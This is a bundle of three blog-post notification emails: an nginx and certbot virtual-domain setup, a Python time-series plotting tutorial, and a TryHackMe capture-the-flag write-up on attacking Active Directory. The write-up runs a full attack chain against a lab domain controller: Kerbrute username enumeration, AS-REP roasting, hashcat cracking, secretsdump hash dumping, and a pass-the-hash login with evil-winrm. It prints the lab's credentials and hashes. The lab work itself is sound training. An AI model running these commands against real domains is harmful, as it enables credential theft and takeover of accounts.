[New post] Handle multiple virtual domains on one debian host | nginx + certbot/letsencrypt

#xxaxxelxx posted: " apt-get install nginx certbot python3-certbot-nginx For every domain create a nginx file, put it into /etc/nginx/sites-available and symlinklink it into /etc/nginx/sites/enabled: /etc/nginx/sites-available/my-domain.tld server { listen 80; " Respond to this post by replying above this line New post on bytes and bones Handle multiple virtual domains on one debian host | nginx + certbot/letsencrypt by #xxaxxelxx apt-get install nginx certbot python3-certbot-nginx For every domain create a nginx file, put it into /etc/nginx/sites-available and symlinklink it into /etc/nginx/sites/enabled: /etc/nginx/sites-available/my-domain.tld server { listen 80; listen [::]:80; server_name my-domain.tld www.my-domain.tld; root /var/www/my-domain.tld; index index.html index.htm; location / { try_files $uri $uri/ =404; } } Create the corresponding dirs and index.htmls (here: /var/www/my-domain.tld) Restart your nginx: systemctl restart nginx Run your certbot certbot --nginx -d my-domain.tld -d www.my-domain.tld That touches your nginx domain files This free site is ad-supported. Learn more ​ #xxaxxelxx | January 12, 2022 at 9:54 am | Tags: certbot, debian, domains, letsencrypt, virtual | Categories: bytes, debian | URL: https://wp.me/p41wSM-C3 Comment    See all comments    Like Unsubscribe to no longer receive posts from bytes and bones. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://bytesandbones.wordpress.com/2022/01/12/handle-multiple-virtual-domains-on-one-debian-host-nginx-certbot-letsencrypt/ Thanks for flying with WordPress.com

[New post] Time Series Graph using Python

Aman Kharwal posted: " A time-series graph is a line plot that displays trends or patterns over a dataset collected over an interval of time. For example, when you visualize a line plot of the daily sales made by a business, you are visualizing a time-series graph. It is one o" New post on Data Science | Machine Learning | Python | C++ | Coding | Programming | JavaScript Time Series Graph using Python by Aman Kharwal A time-series graph is a line plot that displays trends or patterns over a dataset collected over an interval of time. For example, when you visualize a line plot of the daily sales made by a business, you are visualizing a time-series graph. It is one of the most important data visualizations for every data scientist. So if you want to learn how to visualize it using Python, this article is for you. In this article, I will take you through a tutorial on visualizing a time series graph using Python. Time Series Graph A time-series graph is a line plot used to visualize time series data. Time-series data is the data collected over an interval of time. Some of the popular examples of time series data are stock price data, daily sales data, daily covid cases data, etc. While visualizing a time-series graph, the time intervals lie on the x-axis, and the data points collected over those time intervals lie on the y-axis. For example, while visualizing a time-series graph of stock price data, the date column will lie on the x-axis, and the price column will lie on the y-axis. I hope you now have understood what a time series chart is and why it is used in data science. Now, in the section below, I will walk you through how to visualize a time series graph using Python. Time Series Graph using Python To visualize a time series graph using Python, I will be using a stock price dataset. There are many libraries in Python for data visualization; I will be using Plotly as it is easy to visualize interactive visualizations using plotly. So let's start this task by collecting the latest stock price data of Apple: import pandas as pd import yfinance as yf import datetime from datetime import date, timedelta today = date.today() d1 = today.strftime("%Y-%m-%d") end_date = d1 d2 = date.today() - timedelta(days=360) d2 = d2.strftime("%Y-%m-%d") start_date = d2 data = yf.download('AAPL', start=start_date, end=end_date, progress=False) print(data.head()) Open High ... Adj Close Volume Date ... 2021-01-19 127.779999 128.710007 ... 127.046783 90757300 2021-01-20 128.660004 132.490005 ... 131.221054 104319500 2021-01-21 133.800003 139.669998 ... 136.031372 120150900 2021-01-22 136.279999 139.850006 ... 138.217926 114459400 2021-01-25 143.070007 145.089996 ... 142.044327 157611700 [5 rows x 6 columns] The above data is collected by using the yfinance API. You can know more about it from here. Now below is how you can visualize a time series graph using Python: import plotly.express as px figure = px.line(data, x = data.index, y = "Close") figure.show() Summary A time-series graph is a line plot used to visualize time series data. Time-series data is the data collected over an interval of time. While visualizing a time-series graph, the time intervals lie on the x-axis, and the data points collected over those time intervals lie on the y-axis. I hope you liked this article on visualizing a time series chart using Python. Feel free to ask valuable questions in the comments section below. Aman Kharwal | January 12, 2022 at 1:17 pm | Tags: data visualization, Time Series | Categories: Machine Learning | URL: https://wp.me/pbUb2D-4jy Comment    See all comments Unsubscribe to no longer receive posts from Data Science | Machine Learning | Python | C++ | Coding | Programming | JavaScript. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://thecleverprogrammer.com/2022/01/12/time-series-graph-using-python/

[New post] TryHackMe – Attacktive Directory Write-up

shakuganz posted: " Hi everyone! Today's post is on a TryHackMe challenge on Attacktive Directory that will introduce to u Kerberos user enumeration using Kerbrute on Domain Controller (DC), AS-REP Roasting using GetNPUsers on DC, Hashcat to crack Kerberos hashes, dumping " Respond to this post by replying above this line New post on Shakugan TryHackMe – Attacktive Directory Write-up by shakuganz Hi everyone! Today's post is on a TryHackMe challenge on Attacktive Directory that will introduce to u Kerberos user enumeration using Kerbrute on Domain Controller (DC), AS-REP Roasting using GetNPUsers on DC, Hashcat to crack Kerberos hashes, dumping password hashes from DC, and using Evil-WinRM to access the DC. Let's get started! 1. Deploy the machine You can use Kali Linux, Parrot OS, or TryHackMe (THM)'s attack machine to attack the Domain Controller (DC). 2. Setup Impacket installation Impacket has always been very difficult to install correctly. Any missing steps often result in a brunch of errors when running tools from Impacket. Thus, TryHackMe (THM) provided us steps to install correctly. If you are using THM's attack machine, Impacket and Bloodhound have already been installed. Firstly, we have to clone Impacket from the GitHub repository. kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket Next, we shall install the requirements. kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt Finally, we can run the Python installation script. kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install 2. Welcome to Active Directory We first have to use nmap to check out the services available on the Domain Controller (DC). In this simple lab setup, there is only the DC available. Of course with different Active Directory (AD) environments, we may have to enumerate and attack other workstations before we have a shot to access the DC. kali@kali~$ sudo nmap -sC -sV -n -p- 10.10.6.165 [sudo] password for kali: Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-11 22:05 EST Nmap scan report for 10.10.139.4 Host is up (0.36s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 07:17:13Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | DNS_Tree_Name: spookysec.local | Product_Version: 10.0.17763 |_ System_Time: 2022-01-12T07:18:14+00:00 | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local | Not valid before: 2022-01-11T06:34:36 |_Not valid after: 2022-07-13T06:34:36 |_ssl-date: 2022-01-12T07:18:26+00:00; +1s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49673/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49683/tcp open msrpc Microsoft Windows RPC 49689/tcp open msrpc Microsoft Windows RPC 49699/tcp open msrpc Microsoft Windows RPC Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows We can also use enum4linux on port 139/445 to enumerate the NetBIOS for information such as the existing usernames, NetBIOS-Domain Name, SID, etc. kali@kali~$ enum4linux 10.10.6.165 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 11 22:10:14 2022 ========================== | Target Information | ========================== Target ........... 10.10.6.165 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================== | Enumerating Workgroup/Domain on 10.10.6.165 | =================================================== [E] Can't find workgroup/domain =========================================== | Nbtstat Information for 10.10.6.165 | =========================================== Looking up status of 10.10.6.165 No reply from 10.10.6.165 ==================================== | Session Check on 10.10.6.165 | ==================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 10.10.139.4 allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: ========================================== | Getting domain SID for 10.10.6.165 | ========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: THM-AD Domain Sid: S-1-5-21-3591857110-2884097990-301047963 [+] Host is part of a domain (not a workgroup) ... Questions and answers What tool will allow us to enumerate port 139/445? enum4linux What is the NetBIOS-Domain Name of the machine? THM-AD What invalid TLD do people commonly use for their Active Directory Domain? .local 4. Enumerating Users via Kerberos Based on TryHackMe (THM), we are recommended to use Kerbrute for this challenge to brute force Kerberos (key authentication service in Active Directory) to enumerate usernames and passwords. A modified username list and password list have been given to us. Note that it is actually not recommended to brute force credentials due to account lockout policies. Firstly, I downloaded Kerbrute into my Kali and change its execution permission. kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 kali@kali~$ chmod +x kerbrute_linux_amd64 Next, I downloaded both the user list and password list. kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt We can now check out the usage of the tool and use it on the Domain Controller (DC). kali@kali~$ ./kerbrute_linux_amd64 --help ... Usage: kerbrute [command] Available Commands: bruteforce Bruteforce username:password combos, from a file or stdin bruteuser Bruteforce a single user's password from a wordlist help Help about any command passwordspray Test a single password against a list of users userenum Enumerate valid domain usernames via Kerberos version Display version info and quit Flags: --dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS --delay int Delay in millisecond between each attempt. Will always use single thread if set -d, --domain string The full domain to use (e.g. contoso.com) -h, --help help for kerbrute -o, --output string File to write logs to. Optional. --safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE -t, --threads int Threads to use (default 10) -v, --verbose Log failures and errors kali@kali~$ ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=spookysec.local. userlist.txt ... Version: v1.0.3 (9dad6e1) - 01/11/22 - Ronnie Flathers @ropnop 2022/01/11 22:53:06 > Using KDC(s): 2022/01/11 22:53:06 > 10.10.6.165:88 2022/01/11 22:53:07 > [+] VALID USERNAME: james@spookysec.local. 2022/01/11 22:53:13 > [+] VALID USERNAME: svc-admin@spookysec.local. 2022/01/11 22:53:21 > [+] VALID USERNAME: James@spookysec.local. 2022/01/11 22:53:24 > [+] VALID USERNAME: robin@spookysec.local. 2022/01/11 22:53:54 > [+] VALID USERNAME: darkstar@spookysec.local. 2022/01/11 22:54:13 > [+] VALID USERNAME: administrator@spookysec.local. 2022/01/11 22:54:50 > [+] VALID USERNAME: backup@spookysec.local. 2022/01/11 22:55:08 > [+] VALID USERNAME: paradox@spookysec.local. Questions and answers What command within Kerbrute will allow us to enumerate valid usernames? userenum What notable account is discovered? (These should jump out at you) svc-admin What is the other notable account is discovered? (These should jump out at you) backup 5. Abusing Kerberos In this challenge, we can ASREPRoasting as a user account or more do not require pre-authentication details before requesting a Kerberos Ticket. Thus, we can use Impacket's /opt/impacket/examples/GetNPUsers.py to query ASReproastable accounts from the Key Distribution Center. However, we will need to provide a list of usernames. Since previously we already brute force the list of usernames, we can use those usernames. In my validusers.txt: james svc-admin James robin darkstar administrator backup paradox Obtaining ASReproastable accounts. kali@kali~$ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/ Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation [-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566 [-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set We can see that only svc-admin can request a ticket without a need to provide its password. A quick google will allow us to find out we should use mode 18200 to crack the hash. kali@kali~$ hashcat -h | grep 18200 18200 | Kerberos 5, etype 23, AS-REP | Network Protocols Finally, we can attempt to crack the password of svc-admin using hashcat. I first store the hash in hash.txt before cracking it with the password list provided previously. kali@kali~$ cat hash.txt $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566 kali@kali~$ hashcat -m18200 hash.txt passwordlist.txt ... $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566:management2005 It should only take a few seconds to crack the hash on a virtual machine Kali. If you do it on your Windows host, it will be even faster. We should obtain the password "management2005". Questions and answers We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? svc-admin Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name) Kerberos 5, etype 23, AS-REP What mode is the hash? 18200 Now crack the hash with the modified password list provided, what is the user accounts password? management2005 6. Back to the Basics We can now attempt to enumerate SMB shared folders using our newly found credentials. kali@kali~$ smbclient -L 10.10.6.165 -U "svc-admin" Enter WORKGROUP\svc-admin's password: management2005 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backup Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Going through each shared folder, I found an interesting folder to which I can login and see an interesting text file. kali@kali~$ smbclient \\\\10.10.6.165\\backup -U "svc-admin" Enter WORKGROUP\svc-admin's password: management2005 Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Apr 4 15:08:39 2020 .. D 0 Sat Apr 4 15:08:39 2020 backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020 I downloaded the text file and looked at its content. smb: \> get backup_credentials.txt getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \> exit kali@kali~$ cat backup_credentials.txt YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw It looks like it is base64 encoded. Thus, decoding it allows us to see a valid credential. kali@kali~$ base64 -d backup_credentials.txt backup@spookysec.local:backup2517860 Questions and answers What utility can we use to map remote SMB shares? smbclient Which option will list shares? -L How many remote shares is the server listing? 6 There is one particular share that we have access to that contains a text file. Which share is it? backup What is the content of the file? YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw Decoding the contents of the file, what is the full contents? backup@spookysec.local:backup2517860 7. Elevating Privileges within the Domain Obtaining the credentials of backup allows us to have more privileges as the backup account in a Domain Controller (DC) This is because any changes to the Active Directory (AD) will reflect those changes in this backup account. As a result, we can obtain every user's password hashes. To do so, we can use Impacket's secretsdump.py. kali@kali~$ python3 /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.6.165 Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21::: spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b::: spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e::: spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b::: spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7::: spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::: spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb::: spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2::: spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705::: spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664::: spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809::: spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538::: spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226::: Finally, we will need to install evil-winrm to access the system since port 5985 for WinRM is open. kali@kali~$ sudo gem install evil-winrm Questions and answers What method allowed us to dump NTDS.DIT? DRSUAPI What is the Administrators NTLM hash? 0e0363213e37b94221497260b0bcb4fc What method of attack could allow us to authenticate as the user without the password? pass the hash Using a tool called Evil-WinRM what option will allow us to use a hash? -H 8. Flag submission panel Submit the flags for each user account. They can be located on each user's desktop. We can just login into the administrator's account which have access to other users' desktops. kali@kali~$ evil-winrm -i 10.10.6.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc ... *Evil-WinRM* PS C:\Users\Administrator\Documents> We can now access each users's desktop to obtain their hash. *Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\svc-admin\Desktop *Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir Directory: C:\Users\svc-admin\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/4/2020 12:18 PM 28 user.txt.txt *Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt TryHackMe{K3rb3r0s_Pr3_4uth} *Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd C:\Users\backup\Desktop *Evil-WinRM* PS C:\Users\backup\Desktop> dir Directory: C:\Users\backup\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/4/2020 12:19 PM 26 PrivEsc.txt *Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt TryHackMe{B4ckM3UpSc0tty!} *Evil-WinRM* PS C:\Users\backup\Desktop> cd C:\Users\Administrator\Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/4/2020 11:39 AM 32 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt TryHackMe{4ctiveD1rectoryM4st3r} Questions and answers svc-admin TryHackMe{K3rb3r0s_Pr3_4uth} backup TryHackMe{B4ckM3UpSc0tty!} Administrator TryHackMe{4ctiveD1rectoryM4st3r} I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. This post is ad-supported ​ shakuganz | January 12, 2022 at 3:37 pm | Tags: Active Directory, AD, ASPERRoasting, Backup, Capture-the-flag, CTF, CTF Write-up, Cyber, Cyber security, Evil-WinRM, Kerbrute, Python, secretdump, Security, THM, TryHackMe, Windows, WinRM, Write-up | Categories: Active Directory, CTF, Cyber, Kali Linux, Machine, Security | URL: https://wp.me/p9KTg5-1lV Comment    See all comments    Like Unsubscribe to no longer receive posts from Shakugan. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: http://shakuganz.com/2022/01/12/tryhackme-attacktive-directory-write-up/ Thanks for flying with WordPress.com